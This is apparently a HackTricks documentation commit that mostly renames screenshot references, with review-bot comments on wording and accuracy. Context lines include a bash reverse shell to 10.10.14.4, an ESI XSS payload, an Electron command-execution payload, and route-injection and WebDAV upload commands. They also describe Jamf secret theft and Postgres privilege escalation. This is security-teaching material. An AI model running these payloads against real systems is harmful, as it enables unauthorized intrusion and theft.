GITBOOK-3984: change request with no subject merged in GitBook
Before Width: | Height: | Size: 28 KiB After Width: | Height: | Size: 160 KiB |
Before Width: | Height: | Size: 129 KiB After Width: | Height: | Size: 58 KiB |
Before Width: | Height: | Size: 145 KiB After Width: | Height: | Size: 358 KiB |
Before Width: | Height: | Size: 76 KiB |
Before Width: | Height: | Size: 32 KiB After Width: | Height: | Size: 350 KiB |
Before Width: | Height: | Size: 8 KiB After Width: | Height: | Size: 344 KiB |
Before Width: | Height: | Size: 82 KiB After Width: | Height: | Size: 8 KiB |
Before Width: | Height: | Size: 160 KiB After Width: | Height: | Size: 3.4 KiB |
Before Width: | Height: | Size: 535 KiB After Width: | Height: | Size: 33 KiB |
Before Width: | Height: | Size: 58 KiB After Width: | Height: | Size: 535 KiB |
BIN
.gitbook/assets/image (2) (1) (1) (2) (1).png
Normal file
After Width: | Height: | Size: 76 KiB |
Before Width: | Height: | Size: 76 KiB After Width: | Height: | Size: 148 KiB |
Before Width: | Height: | Size: 148 KiB After Width: | Height: | Size: 199 KiB |
Before Width: | Height: | Size: 199 KiB After Width: | Height: | Size: 172 KiB |
Before Width: | Height: | Size: 172 KiB After Width: | Height: | Size: 61 KiB |
Before Width: | Height: | Size: 244 KiB After Width: | Height: | Size: 102 KiB |
Before Width: | Height: | Size: 358 KiB After Width: | Height: | Size: 244 KiB |
Before Width: | Height: | Size: 19 KiB After Width: | Height: | Size: 39 KiB |
Before Width: | Height: | Size: 39 KiB After Width: | Height: | Size: 78 KiB |
Before Width: | Height: | Size: 78 KiB After Width: | Height: | Size: 38 KiB |
Before Width: | Height: | Size: 38 KiB After Width: | Height: | Size: 28 KiB |
BIN
.gitbook/assets/image (4) (1) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 60 KiB |
Before Width: | Height: | Size: 60 KiB After Width: | Height: | Size: 220 KiB |
Before Width: | Height: | Size: 220 KiB After Width: | Height: | Size: 45 KiB |
Before Width: | Height: | Size: 45 KiB After Width: | Height: | Size: 96 KiB |
Before Width: | Height: | Size: 96 KiB After Width: | Height: | Size: 129 KiB |
BIN
.gitbook/assets/image (5) (1) (1) (2) (1).png
Normal file
After Width: | Height: | Size: 53 KiB |
Before Width: | Height: | Size: 53 KiB After Width: | Height: | Size: 91 KiB |
Before Width: | Height: | Size: 91 KiB After Width: | Height: | Size: 316 KiB |
Before Width: | Height: | Size: 316 KiB After Width: | Height: | Size: 29 KiB |
Before Width: | Height: | Size: 29 KiB After Width: | Height: | Size: 145 KiB |
BIN
.gitbook/assets/image (6) (2) (1).png
Normal file
After Width: | Height: | Size: 55 KiB |
Before Width: | Height: | Size: 55 KiB After Width: | Height: | Size: 405 KiB |
Before Width: | Height: | Size: 405 KiB After Width: | Height: | Size: 76 KiB |
BIN
.gitbook/assets/image (7) (1) (3).png
Normal file
After Width: | Height: | Size: 103 KiB |
Before Width: | Height: | Size: 103 KiB After Width: | Height: | Size: 27 KiB |
Before Width: | Height: | Size: 27 KiB After Width: | Height: | Size: 32 KiB |
Before Width: | Height: | Size: 61 KiB After Width: | Height: | Size: 82 KiB |
|
@ -105,11 +105,11 @@ Open the SalseoLoader project using Visual Studio.
|
||||||
|
|
||||||
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
|
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (3) (1) (1) (1).png>)
|
![](<../.gitbook/assets/image (3) (1) (1) (1) (1).png>)
|
||||||
|
|
||||||
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (4) (1) (1) (1).png>)
|
![](<../.gitbook/assets/image (4) (1) (1) (1) (1).png>)
|
||||||
|
|
||||||
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
|
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
|
||||||
|
|
||||||
|
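Review bot: `image (3) (1) (1) (1) (1).png`, the new target of the NuGet Package Manager screenshot, is not among the files this change request adds (the new-file entries at the top list `(2) (1) (1) (2) (1)`, `(4) (1) (1) (1) (1)`, `(5) (1) (1) (2) (1)`, `(6) (2) (1)` and `(7) (1) (3)` only), so confirm that asset already exists under `.gitbook/assets/`, otherwise the step will render a broken image after merge. The DllExport screenshot target `image (4) (1) (1) (1) (1).png` is in the list and is fine.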
@ -117,7 +117,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor
|
||||||
|
|
||||||
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
|
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (5) (1) (1) (2).png>)
|
![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
|
||||||
|
|
||||||
### **Exit Visual Studio and execute DllExport\_configure**
|
### **Exit Visual Studio and execute DllExport\_configure**
|
||||||
|
|
||||||
|
|
|
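Review bot: `Press **Uninstall** (yeah, its weird but trust me, it is necessary)` asks the reader to trust a step it never explains; since the previous hunk already states that installing the package drops `DllExport.bat` and `DllExport_Configure.bat` into the project folder, say that directly (the NuGet package is only needed to deliver those two files, after which it is removed and `DllExport_Configure.bat` is run by hand), and fix `its` to `it's`. The heading below also spells the file `DllExport_configure` while the earlier line names it `DllExport_Configure.bat`; use one spelling.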
@ -137,7 +137,7 @@ Arguments of the script:
|
||||||
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
|
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (20) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (20) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Our host seems to be in trouble :)**
|
**Our host seems to be in trouble :)**
|
||||||
|
|
||||||
|
|
|
@ -49,11 +49,11 @@ You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/J
|
||||||
|
|
||||||
Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form:
|
Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (19).png>)
|
![](<../../.gitbook/assets/image (13).png>)
|
||||||
|
|
||||||
#### JAMF device Authentication
|
#### JAMF device Authentication
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
|
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
|
||||||
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
|
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
|
||||||
|
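Review bot: the context line `jamf **persist** as a **LaunchDaemon** in **/Library/LaunchAgents/com.jamf.management.agent.plist**` contradicts itself: plists under `/Library/LaunchAgents/` are LaunchAgents loaded in the user session, while LaunchDaemons live under `/Library/LaunchDaemons/`. Either the type or the path is wrong; check the plist on a managed host and correct one of them, and change `persist` to `persists`. The keychain secret line should also make clearer that the value is reported as historical (it already says "at the time of the discovery"), so nobody reads it as current.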
@ -100,7 +100,7 @@ With this information, **create a VM** with the **stolen** Hardware **UUID** and
|
||||||
|
|
||||||
#### Secrets stealing
|
#### Secrets stealing
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (8).png" alt=""><figcaption><p>a</p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption><p>a</p></figcaption></figure>
|
||||||
|
|
||||||
You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**.
|
You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**.
|
||||||
|
|
||||||
|
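Review bot: the `<figcaption><p>a</p></figcaption>` on the Secrets stealing figure is a placeholder caption carried over by the rename; either describe what the screenshot shows or drop `<p>a</p>` so the rendered page does not show a stray "a" under the image.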
@ -203,7 +203,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M
|
||||||
|
|
||||||
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
|
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
|
|
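Review bot: `if its a "safe" file` should be `if it's a "safe" file`, and the claim that Safari opens such downloads automatically needs a qualifier: it depends on Safari's "Open 'safe' files after downloading" preference, which is on by default but can be disabled, so the automatic decompression of a zip is not guaranteed on a hardened target.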
@ -23,7 +23,7 @@ This function will make the **allowed binary own the PID** but the **malicious X
|
||||||
If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\
|
If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\
|
||||||
Like for example in this image (taken from the reference):
|
Like for example in this image (taken from the reference):
|
||||||
|
|
||||||
<figure><img src="../../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit:
|
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit:
|
||||||
|
|
||||||
|
|
|
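Review bot: the context line `It highly probable means that it's v**erifying the process PID**` has a grammar error and a misplaced bold marker (the `**` lands inside `verifying`); suggested wording: `it most likely means that it is **verifying the process PID** and not the audit token`. Since the hunk only renames the image, the sentence next to it should be fixed in the same change.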
@ -22,7 +22,7 @@ Obviously, this is so powerful, it's complicated to load a kernel extension. The
|
||||||
|
|
||||||
* Going into **recovery mode** Kexts need to be **allowed to be loaded**:
|
* Going into **recovery mode** Kexts need to be **allowed to be loaded**:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
* The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail the **company** and the **reasons** why this is needed.
|
* The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail the **company** and the **reasons** why this is needed.
|
||||||
* The Kext also needs to be **notarized**, Apple will be able to check it for malware.
|
* The Kext also needs to be **notarized**, Apple will be able to check it for malware.
|
||||||
|
|
|
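Review bot: the bullet `The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail ...` breaks one sentence into a fragment; join them as `..., which only **Apple** grants, after **reviewing** in detail the **company** and the **reasons** why it is needed.` The first bullet `Going into **recovery mode** Kexts need to be **allowed to be loaded**` also reads awkwardly; `Kext loading must be **enabled from recovery mode**` says the same thing.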
@ -16,7 +16,7 @@
|
||||||
|
|
||||||
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
|
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (13).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
|
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
|
||||||
|
|
||||||
|
@ -56,7 +56,7 @@ The events that the Endpoint Security framework can monitor are categorized into
|
||||||
|
|
||||||
### Endpoint Security Framework Architecture
|
### Endpoint Security Framework Architecture
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:
|
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:
|
||||||
|
|
||||||
|
|
|
@ -76,7 +76,7 @@ fat_magic FAT_MAGIC
|
||||||
|
|
||||||
or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
|
or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (5) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
|
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
|
||||||
|
|
||||||
|
@ -199,11 +199,11 @@ struct section_64 { /* for 64-bit architectures */
|
||||||
|
|
||||||
Example of **section header**:
|
Example of **section header**:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (6) (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
|
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
It's also possible to get **headers information** from the **command line** with:
|
It's also possible to get **headers information** from the **command line** with:
|
||||||
|
|
||||||
|
|
|
@ -32,7 +32,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
Note that now **hardened** Electron applications will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
|
Note that now **hardened** Electron applications with **RunAsNode** disabled will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
|
||||||
|
|
||||||
However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
|
However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
|
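Review bot: the new wording `hardened Electron applications with **RunAsNode** disabled will **ignore node parameters** (such as --inspect) when launched unless the env variable **ELECTRON_RUN_AS_NODE** is set` is self-contradictory: disabling the RunAsNode fuse is precisely what makes `ELECTRON_RUN_AS_NODE` ignored, so the `unless` clause cannot apply to that case, and `--inspect`-style flags are controlled by a separate fuse (EnableNodeCliInspectArguments), not by RunAsNode. Suggest splitting the sentence: with the RunAsNode fuse disabled, `ELECTRON_RUN_AS_NODE` has no effect; with the node CLI inspect fuse disabled, `--inspect` is ignored. The following sentence about `--remote-debugging-port=9229` can stay as is.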
@ -14,7 +14,7 @@
|
||||||
|
|
||||||
## Sandbox loading process
|
## Sandbox loading process
|
||||||
|
|
||||||
<figure><img src="../../../../../.gitbook/assets/image (2).png" alt=""><figcaption><p>Image from <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
|
<figure><img src="../../../../../.gitbook/assets/image (2) (1).png" alt=""><figcaption><p>Image from <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
|
||||||
|
|
||||||
In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.
|
In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.
|
||||||
|
|
||||||
|
|
|
@ -143,7 +143,7 @@ $> ls ~/Documents
|
||||||
|
|
||||||
Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file:
|
Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file:
|
||||||
|
|
||||||
<figure><img src="../../../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### CVE-2021-XXXX - Translocation
|
### CVE-2021-XXXX - Translocation
|
||||||
|
|
||||||
|
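Review bot: `copy a protected file in a noe` is a typo for `note`, and `notes` should be capitalised as the app name `Notes` in that sentence. The heading `### CVE-2021-XXXX - Translocation` still carries a placeholder identifier; put the real CVE in if it is known, otherwise drop the number rather than ship `XXXX` in a heading.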
@ -387,7 +387,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was
|
||||||
|
|
||||||
In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple).
|
In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple).
|
||||||
|
|
||||||
<figure><img src="../../../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
## Reference
|
## Reference
|
||||||
|
|
||||||
|
|
|
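Review bot: `In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple)` needs rewording, since the subject is the application writing the data, not the file: `On several occasions apps store sensitive information such as emails, phone numbers or messages in unprotected locations (which Apple counts as a vulnerability).`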
@ -479,7 +479,7 @@ In[ this **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem
|
||||||
|
|
||||||
When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
|
When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (4) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (4) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
|
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
|
||||||
|
|
||||||
|
|
|
@ -42,7 +42,7 @@ davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every
|
||||||
|
|
||||||
Output sample:
|
Output sample:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (19) (1) (1).png>)
|
![](<../../.gitbook/assets/image (19) (1).png>)
|
||||||
|
|
||||||
This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
|
This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
|
||||||
|
|
||||||
|
|
|
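Review bot: the context line `This mean that you can **access this files** through the web` should read `This means that you can **access these files** through the web`; the point it makes (davtest reporting `.txt` and `.html` as uploadable says nothing about execution) is right, only the grammar is off.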
@ -35,12 +35,12 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
|
||||||
|
|
||||||
* Configure WebHook script:
|
* Configure WebHook script:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
* Save changes
|
* Save changes
|
||||||
* Get the generated WebHook URL:
|
* Get the generated WebHook URL:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
* Call it with curl and you shuold receive the rev shell
|
* Call it with curl and you shuold receive the rev shell
|
||||||
|
|
||||||
|
|
|
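Review bot: `Call it with curl and you shuold receive the rev shell` should read `... you should receive the reverse shell`. The `exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")` line in the hunk header hard-codes a listener address; a short note that the reader must replace the host and port with their own would prevent copy-paste failures.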
@ -206,7 +206,7 @@ The following will add a `Location` header to the response
|
||||||
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
|
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (5) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (5) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
#### CRLF in Add header (**CVE-2019-2438)**
|
#### CRLF in Add header (**CVE-2019-2438)**
|
||||||
|
|
||||||
|
|
|
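Review bot: the heading `#### CRLF in Add header (**CVE-2019-2438)**` closes the bold span after the parenthesis, so it renders `CVE-2019-2438)` in bold with an unbalanced bracket; it should be `(**CVE-2019-2438**)`.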
@ -27,11 +27,11 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo
|
||||||
|
|
||||||
In the Burp's builtin browser go to the **Burp extension** and enable it:
|
In the Burp's builtin browser go to the **Burp extension** and enable it:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (4) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
|
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### Inject a Canary
|
### Inject a Canary
|
||||||
|
|
||||||
|
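Review bot: `Noe refresh the page` should be `Now refresh the page`, and `go to the **Burp extension** and enable it` should say what is being enabled (the DOM Invader toggle in the Burp Suite browser extension) so the step is unambiguous for someone who has not used it before.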
@ -69,7 +69,7 @@ You can click each message to view more detailed information about it, including
|
||||||
|
|
||||||
DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
|
DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
|
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
|
||||||
|
|
||||||
|
|
|
@ -24,7 +24,7 @@ For more info about what is an iButton check:
|
||||||
|
|
||||||
The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**.
|
The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**.
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (20) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (20).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
## Actions
|
## Actions
|
||||||
|
|
||||||
|
|
|
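Review bot: `following imageis how` is missing a space (`image is`), and `Flipper zero` should be written `Flipper Zero` to match the product name.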
@ -16,7 +16,7 @@
|
||||||
|
|
||||||
iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside.
|
iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (19) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (19).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### What is iButton? <a href="#what-is-ibutton" id="what-is-ibutton"></a>
|
### What is iButton? <a href="#what-is-ibutton" id="what-is-ibutton"></a>
|
||||||
|
|
||||||
|
|
|
@ -32,7 +32,7 @@ IR protocols differ in 3 factors:
|
||||||
|
|
||||||
Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant.
|
Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (16) (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**2. Pulse Width Encoding**
|
**2. Pulse Width Encoding**
|
||||||
|
|
||||||
|
|
|
@ -7,7 +7,7 @@
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
